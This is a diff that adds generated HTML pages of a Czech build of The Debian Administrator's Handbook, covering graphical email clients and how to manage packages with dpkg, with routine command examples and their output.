+            id="id-1.16.7.3.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>COMMUNITY</em></span> <span
+                        class="emphasis"><em>Popular</em></span> packages</strong></p></div></div></div><div
+              class="para">
+				Installing the <span
+                class="pkg pkg">popularity-contest</span> package enables participation in an automated survey that informs the Debian project about the most popular packages. A script is run weekly by <code
+                class="command">cron</code> which sends (by HTTP or email) an anonymized list of the installed packages and the latest access date for the files they contain. This allows the Debian maintainers to know which packages are most frequently installed, and of these, how frequently they are actually used.
+			</div><a
+              id="id-1.16.7.3.3.3"
+              class="indexterm"></a><a
+              id="id-1.16.7.3.3.4"
+              class="indexterm"></a><a
+              id="id-1.16.7.3.3.5"
+              class="indexterm"></a><div
+              class="para">
+				This information is a great help to the Debian project. It is used to determine which packages should go on the first installation disks. The installation data is also an important factor used to decide whether to remove a package with very few users from the distribution. We heartily recommend installing the <span
+                class="pkg pkg">popularity-contest</span> package, and participating in the survey.
+			</div><div
+              class="para">
+				The collected data are made public every day. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://popcon.debian.org/">https://popcon.debian.org/</a></div>
+			</div><div
+              class="para">
+				These statistics can also help users to choose between two packages that seem otherwise equivalent. Choosing the more popular package is probably a safer choice.
+			</div></div><div
+            class="para">
+				Evolution is the GNOME email client and can be installed with <code
+              class="command">apt install evolution</code>. Evolution is more than a simple email client: it also provides a calendar, an address book, a task list, and a memo (free-form note) application. Its email component includes a powerful message indexing system, and allows for the creation of virtual folders based on search queries on all archived messages. In other words, all messages are stored the same way but displayed in a folder-based organization, each folder containing messages that match a set of filtering criteria.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.7.3.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/evolution.png"
+                  alt="The Evolution email software" /></div></div><p
+              class="title"><strong>Obrázek 13.4. The Evolution email software</strong></p></div><div
+            class="para">
+				An extension to Evolution allows integration with a Microsoft Exchange email system; the required package is <span
+              class="pkg pkg">evolution-ews</span>.
+			</div><a
+            id="id-1.16.7.3.7"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.7.4"></a>13.4.2. KMail</h3></div></div></div><a
+            id="id-1.16.7.4.2"
+            class="indexterm"></a><div
+            class="para">
+				The KDE email software can be installed with <code
+              class="command">apt install kmail</code>. KMail only handles email, but it belongs to a software suite called KDE-PIM (for <span
+              class="emphasis"><em>Personal Information Manager</em></span>) that includes features such as address books, a calendar component, and so on. KMail has all the features one would expect from an excellent email client.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.7.4.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/kmail.png"
+                  alt="The KMail email software" /></div></div><p
+              class="title"><strong>Obrázek 13.5. The KMail email software</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.7.5"></a>13.4.3. Thunderbird and Icedove</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">thunderbird</span> package provides the email client from the Mozilla software suite. Until <span
+              class="distribution distribution">Jessie</span> Debian contained Icedove and not Thunderbird for legal reasons detailed in the sidebar <a
+              class="xref"
+              href="sect.web-browsers.html#sidebar.firefox-iceweasel"><span
+                class="emphasis"><em>CULTURE</em></span> Iceweasel, Firefox and others</a>. You may find references to Icedove as the switch has been done recently.
+			</div><div
+            class="para">
+				Various localization sets are available in <span
+              class="pkg pkg">thunderbird-l10n-*</span> packages; the <span
+              class="pkg pkg">enigmail</span> extension handles message encrypting and signing, but it is not available in all languages.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.7.5.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/thunderbird.png"
+                  alt="The Thunderbird email software" /></div></div><p
+              class="title"><strong>Obrázek 13.6. The Thunderbird email software</strong></p></div><a
+            id="id-1.16.7.5.5"
+            class="indexterm"></a><a
+            id="id-1.16.7.5.6"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.graphical-desktops.html"><strong>Předcházející</strong>13.3. Graphical Desktops</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.web-browsers.html"><strong>Další</strong>13.5. Web Browsers</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html
new file mode 100644
index 000000000..4bdd04b35
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.manipulating-packages-with-dpkg.html
@@ -0,0 +1,670 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.4. Manipulating Packages with dpkg</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="sect.source-package-structure.html"
+        title="5.3. Structure of a Source Package" /><link
+        rel="next"
+        href="sect.coexistence-with-other-packaging-systems.html"
+        title="5.5. Coexistence with Other Packaging Systems" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.manipulating-packages-with-dpkg.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.source-package-structure.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.manipulating-packages-with-dpkg"></a>5.4. Manipulating Packages with <code
+                  class="command">dpkg</code></h2></div></div></div><a
+          id="id-1.8.8.2"
+          class="indexterm"></a><div
+          class="para">
+			<code
+            class="command">dpkg</code> is the base command for handling Debian packages on the system. If you have <code
+            class="filename">.deb</code> packages, it is <code
+            class="command">dpkg</code> that allows installation or analysis of their contents. But this program only has a partial view of the Debian universe: it knows what is installed on the system, and whatever it is given on the command line, but knows nothing of the other available packages. As such, it will fail if a dependency is not met. Tools such as <code
+            class="command">apt</code>, on the contrary, will create a list of dependencies to install everything as automatically as possible.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> <code
+                      class="command">dpkg</code> or <code
+                      class="command">apt</code>?</strong></p></div></div></div><div
+            class="para">
+			<code
+              class="command">dpkg</code> should be seen as a system tool (backend), and <code
+              class="command">apt</code> as a tool closer to the user, which overcomes the limitations of the former. These tools work together, each one with its particularities, suited to specific tasks.
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.5"></a>5.4.1. Installing Packages</h3></div></div></div><a
+            id="id-1.8.8.5.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.5.3"
+            class="indexterm"></a><div
+            class="para">
+				<code
+              class="command">dpkg</code> is, above all, the tool for installing an already available Debian package (because it does not download anything). To do this, we use its <code
+              class="literal">-i</code> or <code
+              class="literal">--install</code> option.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.5.5"></a><p
+              class="title"><strong>Příklad 5.2. Installation of a package with <code
+                  class="command">dpkg</code></strong></p><div
+              class="example-contents"><pre
+                class="screen scale">
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>dpkg -i man-db_2.7.6.1-2_amd64.deb</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-1) ...
+Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+Processing triggers for mime-support (3.60) ...</code></pre></div></div><div
+            class="para">
+				We can see the different steps performed by <code
+              class="command">dpkg</code>; we know, thus, at what point any error may have occurred. The installation can also be effected in two stages: first unpacking, then configuration. <code
+              class="command">apt-get</code> takes advantage of this, limiting the number of calls to <code
+              class="command">dpkg</code> (since each call is costly, due to loading of the database in memory, especially the list of already installed files).
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.5.7"></a><p
+              class="title"><strong>Příklad 5.3. Separate unpacking and configuration</strong></p><div
+              class="example-contents"><pre
+                class="screen scale">
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>dpkg --unpack man-db_2.7.6.1-2_amd64.deb</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-2) ...
+Processing triggers for mime-support (3.60) ...
+# </code><strong
+                  class="userinput"><code>dpkg --configure man-db</code></strong>
+<code
+                  class="computeroutput">Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+</code></pre></div></div><a
+            id="id-1.8.8.5.8"
+            class="indexterm"></a><a
+            id="id-1.8.8.5.9"
+            class="indexterm"></a><div
+            class="para">
+				Sometimes <code
+              class="command">dpkg</code> will fail to install a package and return an error; if the user orders it to ignore this, it will only issue a warning; it is for this reason that we have the different <code
+              class="literal">--force-*</code> options. The <code
+              class="command">dpkg --force-help</code> command, or documentation of this command, will give a complete list of these options. The most frequent error, which you are bound to encounter sooner or later, is a file collision. When a package contains a file that is already installed by another package, <code
+              class="command">dpkg</code> will refuse to install it. The following messages will then appear:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">Unpacking libgdm (from .../libgdm_3.8.3-2_amd64.deb) ...
+dpkg: error processing /var/cache/apt/archives/libgdm_3.8.3-2_amd64.deb (--unpack):
+ trying to overwrite '/usr/bin/gdmflexiserver', which is also in package gdm3 3.4.1-9</code></pre><div
+            class="para">
+				In this case, if you think that replacing this file is not a significant risk to the stability of your system (which is usually the case), you can use the option <code
+              class="literal">--force-overwrite</code>, which tells <code
+              class="command">dpkg</code> to ignore this error and overwrite the file.
+			</div><div
+            class="para">
+				While there are many available <code
+              class="literal">--force-*</code> options, only <code
+              class="literal">--force-overwrite</code> is likely to be used regularly. These options only exist for exceptional situations, and it is better to leave them alone as much as possible in order to respect the rules imposed by the packaging mechanism. Do not forget, these rules ensure the consistency and stability of your system.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Effective use of <code
+                        class="literal">--force-*</code></strong></p></div></div></div><a
+              id="id-1.8.8.5.14.2"
+              class="indexterm"></a><div
+              class="para">
+				If you are not careful, the use of an option <code
+                class="literal">--force-*</code> can lead to a system where the APT family of commands will refuse to function. In effect, some of these options allow installation of a package when a dependency is not met, or when there is a conflict. The result is an inconsistent system from the point of view of dependencies, and the APT commands will refuse to execute any action except those that will bring the system back to a consistent state (this often consists of installing the missing dependency or removing a problematic package). This often results in a message like this one, obtained after installing a new version of <span
+                class="pkg pkg">rdesktop</span> while ignoring its dependency on a newer version of the <span
+                class="pkg pkg">libc6</span>:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt full-upgrade
+</code></strong><code
+                class="computeroutput">[...]
+You might want to run 'apt-get -f install' to correct these.
+The following packages have unmet dependencies:
+  rdesktop: Depends: libc6 (&gt;= 2.5) but 2.3.6.ds1-13etch7 is installed
+E: Unmet dependencies. Try using -f.</code></pre><div
+              class="para">
+				A courageous administrator who is certain of the correctness of their analysis may choose to ignore a dependency or conflict and use the corresponding <code
+                class="literal">--force-*</code> option. In this case, if they want to be able to continue to use <code
+                class="command">apt</code> or <code
+                class="command">aptitude</code>, they must edit <code
+                class="filename">/var/lib/dpkg/status</code> to delete/modify the dependency, or conflict, that they chose to override.
+			</div><div
+              class="para">
+				This manipulation is an ugly hack, and should never be used, except in the most extreme case of necessity. Quite frequently, a more fitting solution is to recompile the package that's causing the problem (see <a
+                class="xref"
+                href="debian-packaging.html#sect.rebuilding-package">15.1 – „Rebuilding a Package from its Sources“</a>) or use a new version (potentially corrected) from a repository such as the <code
+                class="literal">stable-backports</code> one (see <a
+                class="xref"
+                href="apt.html#sect.backports">6.1.2.4 – „Stable Backports“</a>).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.6"></a>5.4.2. Package Removal</h3></div></div></div><a
+            id="id-1.8.8.6.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.6.3"
+            class="indexterm"></a><a
+            id="id-1.8.8.6.4"
+            class="indexterm"></a><a
+            id="id-1.8.8.6.5"
+            class="indexterm"></a><div
+            class="para">
+				Invoking <code
+              class="command">dpkg</code> with the <code
+              class="literal">-r</code> or <code
+              class="literal">--remove</code> option, followed by the name of a package, removes that package. This removal is, however, not complete: all of the configuration files, maintainer scripts, log files (system logs) and other user data handled by the package remain. That way disabling the program is easily done by uninstalling it, and it's still possible to quickly reinstall it with the same configuration. To completely remove everything associated with a package, use the <code
+              class="literal">-P</code> or <code
+              class="literal">--purge</code> option, followed by the package name.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.6.7"></a><p
+              class="title"><strong>Příklad 5.4. Removal and purge of the <span
+                  class="pkg pkg">debian-cd</span> package</strong></p><div
+              class="example-contents"><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>dpkg -r debian-cd</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 112188 files and directories currently installed.)
+Removing debian-cd (3.1.20) ...
+# </code><strong
+                  class="userinput"><code>dpkg -P debian-cd</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 111613 files and directories currently installed.)
+Purging configuration files for debian-cd (3.1.20) ...
+</code></pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.7"></a>5.4.3. Querying <code
+                    class="command">dpkg</code>'s Database and Inspecting <code
+                    class="filename">.deb</code> Files</h3></div></div></div><a
+            id="id-1.8.8.7.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.7.3"
+            class="indexterm"></a><a
+            id="id-1.8.8.7.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Option syntax</strong></p></div></div></div><div
+              class="para">
+				Most options are available in a “long” version (one or more relevant words, preceded by a double dash) and a “short” version (a single letter, often the initial of one word from the long version, and preceded by a single dash). This convention is so common that it is a POSIX standard.
+			</div></div><div
+            class="para">
+				Before concluding this section, we will study <code
+              class="command">dpkg</code> options that query the internal database in order to obtain information. Giving first the long options and then corresponding short options (that will evidently take the same possible arguments) we cite <code
+              class="literal">--listfiles <em
+                class="replaceable">package</em></code> (or <code
+              class="literal">-L</code>), which lists the files installed by this package; <code
+              class="literal">--search <em
+                class="replaceable">file</em></code> (or <code
+              class="literal">-S</code>), which finds the package(s) containing the file; <code
+              class="literal">--status <em
+                class="replaceable">package</em></code> (or <code
+              class="literal">-s</code>), which displays the headers of an installed package; <code
+              class="literal">--list</code> (or <code
+              class="literal">-l</code>), which displays the list of packages known to the system and their installation status; <code
+              class="literal">--contents <em
+                class="replaceable">file.deb</em></code> (or <code
+              class="literal">-c</code>), which lists the files in the Debian package specified; <code
+              class="literal">--info<em
+                class="replaceable"> file.deb </em></code> (or <code
+              class="literal">-I</code>), which displays the headers of this Debian package.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.7.7"></a><p
+              class="title"><strong>Příklad 5.5. Various queries with <code
+                  class="command">dpkg</code></strong></p><div
+              class="example-contents"><pre
+                class="screen scale"
+                width="80">
+<code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>dpkg -L base-passwd</code></strong>
+<code
+                  class="computeroutput">/.
+/usr
+/usr/sbin
+/usr/sbin/update-passwd
+/usr/share
+/usr/share/base-passwd
+/usr/share/base-passwd/group.master
+/usr/share/base-passwd/passwd.master
+/usr/share/doc
+/usr/share/doc/base-passwd
+/usr/share/doc/base-passwd/README
+/usr/share/doc/base-passwd/changelog.gz
+/usr/share/doc/base-passwd/copyright
+/usr/share/doc/base-passwd/users-and-groups.html
+/usr/share/doc/base-passwd/users-and-groups.txt.gz
+/usr/share/doc-base
+/usr/share/doc-base/users-and-groups
+/usr/share/lintian
+/usr/share/lintian/overrides
+/usr/share/lintian/overrides/base-passwd
+/usr/share/man
+/usr/share/man/de
+/usr/share/man/de/man8
+/usr/share/man/de/man8/update-passwd.8.gz
+/usr/share/man/es
+/usr/share/man/es/man8
+/usr/share/man/es/man8/update-passwd.8.gz
+/usr/share/man/fr
+/usr/share/man/fr/man8
+/usr/share/man/fr/man8/update-passwd.8.gz
+/usr/share/man/ja
+/usr/share/man/ja/man8
+/usr/share/man/ja/man8/update-passwd.8.gz
+/usr/share/man/man8
+/usr/share/man/man8/update-passwd.8.gz
+/usr/share/man/pl
+/usr/share/man/pl/man8
+/usr/share/man/pl/man8/update-passwd.8.gz
+/usr/share/man/ru
+/usr/share/man/ru/man8
+/usr/share/man/ru/man8/update-passwd.8.gz
+$ </code><strong
+                  class="userinput"><code>dpkg -S /bin/date</code></strong>
+<code
+                  class="computeroutput">coreutils: /bin/date
+$ </code><strong
+                  class="userinput"><code>dpkg -s coreutils</code></strong>
+<code
+                  class="computeroutput">Package: coreutils
+Essential: yes
+Status: install ok installed
+Priority: required
+Section: utils
+Installed-Size: 15103
+Maintainer: Michael Stone &lt;mstone@debian.org&gt;
+Architecture: amd64
+Multi-Arch: foreign
+Version: 8.26-3
+Replaces: mktemp, realpath, timeout
+Pre-Depends: libacl1 (&gt;= 2.2.51-8), libattr1 (&gt;= 1:2.4.46-8), libc6 (&gt;= 2.17), libselinux1 (&gt;= 2.1.13)
+Conflicts: timeout
+Description: GNU core utilities
+ This package contains the basic file, shell and text manipulation
+ utilities which are expected to exist on every operating system.
+ .
+ Specifically, this package includes:
+ arch base64 basename cat chcon chgrp chmod chown chroot cksum comm cp
+ csplit cut date dd df dir dircolors dirname du echo env expand expr
+ factor false flock fmt fold groups head hostid id install join link ln
+ logname ls md5sum mkdir mkfifo mknod mktemp mv nice nl nohup nproc numfmt
+ od paste pathchk pinky pr printenv printf ptx pwd readlink realpath rm
+ rmdir runcon sha*sum seq shred sleep sort split stat stty sum sync tac
+ tail tee test timeout touch tr true truncate tsort tty uname unexpand
+ uniq unlink users vdir wc who whoami yes
+Homepage: http://gnu.org/software/coreutils
+$ </code><strong
+                  class="userinput"><code>dpkg -l 'b*'</code></strong>
+<code
+                  class="computeroutput">Desired=Unknown/Install/Remove/Purge/Hold
+| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
+|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
+||/ Name                 Version         Architecture    Description
++++-====================-===============-===============-=============================================
+un  backupninja          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  backuppc             &lt;none&gt;          &lt;none&gt;          (no description available)
+un  baekmuk-ttf          &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base                 &lt;none&gt;          &lt;none&gt;          (no description available)
+un  base-config          &lt;none&gt;          &lt;none&gt;          (no description available)
+ii  base-files           9.9+deb9u1      amd64           Debian base system miscellaneous files
+ii  base-passwd          3.5.43          amd64           Debian base system master password and group 
+ii  bash                 4.4-5           amd64           GNU Bourne Again SHell
+[...]
+$ </code><strong
+                  class="userinput"><code>dpkg -c /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</code></strong>
+<code
+                  class="computeroutput">drwxr-xr-x root/root         0 2017-09-18 20:41 ./
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/bin/
+-rwxr-xr-x root/root    996648 2017-09-18 20:41 ./usr/bin/gpg
+-rwxr-xr-x root/root      3444 2017-09-18 20:41 ./usr/bin/gpg-zip
+-rwxr-xr-x root/root    161192 2017-09-18 20:41 ./usr/bin/gpgconf
+-rwxr-xr-x root/root     26696 2017-09-18 20:41 ./usr/bin/gpgparsemail
+-rwxr-xr-x root/root     76112 2017-09-18 20:41 ./usr/bin/gpgsplit
+-rwxr-xr-x root/root    158344 2017-09-18 20:41 ./usr/bin/kbxutil
+-rwxr-xr-x root/root      1081 2014-06-25 16:17 ./usr/bin/lspgpot
+-rwxr-xr-x root/root      2194 2017-09-18 20:41 ./usr/bin/migrate-pubring-from-classic-gpg
+-rwxr-xr-x root/root     14328 2017-09-18 20:41 ./usr/bin/watchgnupg
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/sbin/
+-rwxr-xr-x root/root      3078 2017-09-18 20:41 ./usr/sbin/addgnupghome
+-rwxr-xr-x root/root      2219 2017-09-18 20:41 ./usr/sbin/applygnupgdefaults
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/
+drwxr-xr-x root/root         0 2017-09-18 20:41 ./usr/share/doc/gnupg/
+-rw-r--r-- root/root     18964 2017-01-23 18:39 ./usr/share/doc/gnupg/DETAILS.gz
+[...]
+$ </code><strong
+                  class="userinput"><code>dpkg -I /var/cache/apt/archives/gnupg_2.1.18-8~deb9u1_amd64.deb</code></strong>
+<code
+                  class="computeroutput"> new debian package, version 2.0.
+ size 1124042 bytes: control archive=2221 bytes.
+    1388 bytes,    24 lines      control              
+    2764 bytes,    43 lines      md5sums              
+ Package: gnupg
+ Source: gnupg2
+ Version: 2.1.18-8~deb9u1
+ Architecture: amd64
+ Maintainer: Debian GnuPG Maintainers &lt;pkg-gnupg-maint@lists.alioth.debian.org&gt;
+ Installed-Size: 2088
+ Depends: gnupg-agent (= 2.1.18-8~deb9u1), libassuan0 (&gt;= 2.0.1), libbz2-1.0, libc6 (&gt;= 2.15), libgcrypt20 (&gt;= 1.7.0), libgpg-error0 (&gt;= 1.14), libksba8 (&gt;= 1.3.4), libreadline7 (&gt;= 6.0), libsqlite3-0 (&gt;= 3.7.15), zlib1g (&gt;= 1:1.1.4)
+ Recommends: dirmngr (= 2.1.18-8~deb9u1), gnupg-l10n (= 2.1.18-8~deb9u1)
+ Suggests: parcimonie, xloadimage
+ Breaks: debsig-verify (&lt;&lt; 0.15), dirmngr (&lt;&lt; 2.1.18-8~deb9u1), gnupg2 (&lt;&lt; 2.1.11-7+exp1), libgnupg-interface-perl (&lt;&lt; 0.52-3), libgnupg-perl (&lt;= 0.19-1), libmail-gnupg-perl (&lt;= 0.22-1), monkeysphere (&lt;&lt; 0.38~), php-crypt-gpg (&lt;= 1.4.1-1), python-apt (&lt;= 1.1.0~beta4), python-gnupg (&lt;&lt; 0.3.8-3), python3-apt (&lt;= 1.1.0~beta4)
+ Replaces: gnupg2 (&lt;&lt; 2.1.11-7+exp1)
+ Provides: gpg
+ Section: utils
+ Priority: optional
+ Multi-Arch: foreign
+ Homepage: https://www.gnupg.org/
+ Description: GNU privacy guard - a free PGP replacement
+  GnuPG is GNU's tool for secure communication and data storage.
+  It can be used to encrypt data and to create digital signatures.
+  It includes an advanced key management facility and is compliant
+  with the proposed OpenPGP Internet standard as described in RFC4880.
+[...]</code></pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Comparison of versions</strong></p></div></div></div><a
+              id="id-1.8.8.7.8.2"
+              class="indexterm"></a><a
+              id="id-1.8.8.7.8.3"
+              class="indexterm"></a><div
+              class="para">
+				Since <code
+                class="command">dpkg</code> is the program for handling Debian packages, it also provides the reference implementation of the logic of comparing version numbers. This is why it has a <code
+                class="literal">--compare-versions</code> option, usable by external programs (especially configuration scripts executed by <code
+                class="command">dpkg</code> itself). This option requires three parameters: a version number, a comparison operator, and a second version number. The different possible operators are <code
+                class="literal">lt</code> (strictly less than), <code
+                class="literal">le</code> (less than or equal to), <code
+                class="literal">eq</code> (equal), <code
+                class="literal">ne</code> (not equal), <code
+                class="literal">ge</code> (greater than or equal to), and <code
+                class="literal">gt</code> (strictly greater than). If the comparison is correct, <code
+                class="command">dpkg</code> returns 0 (success); if not, it gives a non-zero return value (indicating failure).
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 1.2-3 gt 1.1-4</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">0
+$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 1.2-3 lt 1.1-4</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">1
+$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 2.6.0pre3-1 lt 2.6.0-1</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">1</code></pre><div
+              class="para">
+				Note the unexpected failure of the last comparison: for <code
+                class="command">dpkg</code>, <code
+                class="literal">pre</code>, usually denoting a pre-release, has no particular meaning, and this program compares the alphabetic characters in the same way as the numbers (a &lt; b &lt; c ...), in alphabetical order. This is why it considers “<code
+                class="literal">0pre3</code>” to be greater than “<code
+                class="literal">0</code>”. When we want a package's version number to indicate that it is a pre-release, we use the tilde character, “<code
+                class="literal">~</code>”:
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg --compare-versions 2.6.0~pre3-1 lt 2.6.0-1</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>echo $?</code></strong>
+<code
+                class="computeroutput">0</code></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.8"></a>5.4.4. <code
+                    class="command">dpkg</code>'s Log File</h3></div></div></div><div
+            class="para">
+				<code
+              class="command">dpkg</code> keeps a log of all of its actions in <code
+              class="filename">/var/log/dpkg.log</code>. This log is extremely verbose, since it details every one of the stages through which packages handled by <code
+              class="command">dpkg</code> go. In addition to offering a way to track dpkg's behavior, it helps, above all, to keep a history of the development of the system: one can find the exact moment when each package has been installed or updated, and this information can be extremely useful in understanding a recent change in behavior. Additionally, all versions being recorded, it is easy to cross-check the information with the <code
+              class="filename">changelog.Debian.gz</code> for packages in question, or even with online bug reports.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.multi-arch"></a>5.4.5. Multi-Arch Support</h3></div></div></div><a
+            id="id-1.8.8.9.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.9.3"
+            class="indexterm"></a><div
+            class="para">
+				All Debian packages have an <code
+              class="literal">Architecture</code> field in their control information. This field can contain either “<code
+              class="literal">all</code>” (for packages that are architecture independent) or the name of the architecture that it targets (like “amd64”, “armhf”, …). In the latter case, by default, <code
+              class="command">dpkg</code> will only accept to install the package if its architecture matches the host's architecture as returned by <code
+              class="command">dpkg --print-architecture</code>.
+			</div><div
+            class="para">
+				This restriction ensures that users do not end up with binaries compiled for an incorrect architecture. Everything would be perfect except that (some) computers can run binaries for multiple architectures, either natively (an “amd64“ system can run “i386” binaries) or through emulators.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.8.9.6"></a>5.4.5.1. Enabling Multi-Arch</h4></div></div></div><div
+              class="para">
+					<code
+                class="command">dpkg</code>'s multi-arch support allows users to define “foreign architectures” that can be installed on the current system. This is simply done with <code
+                class="command">dpkg --add-architecture</code> like in the example below. There is a corresponding <code
+                class="command">dpkg --remove-architecture</code> to drop support of a foreign architecture, but it can only be used when no packages of this architecture remain.
+				</div><pre
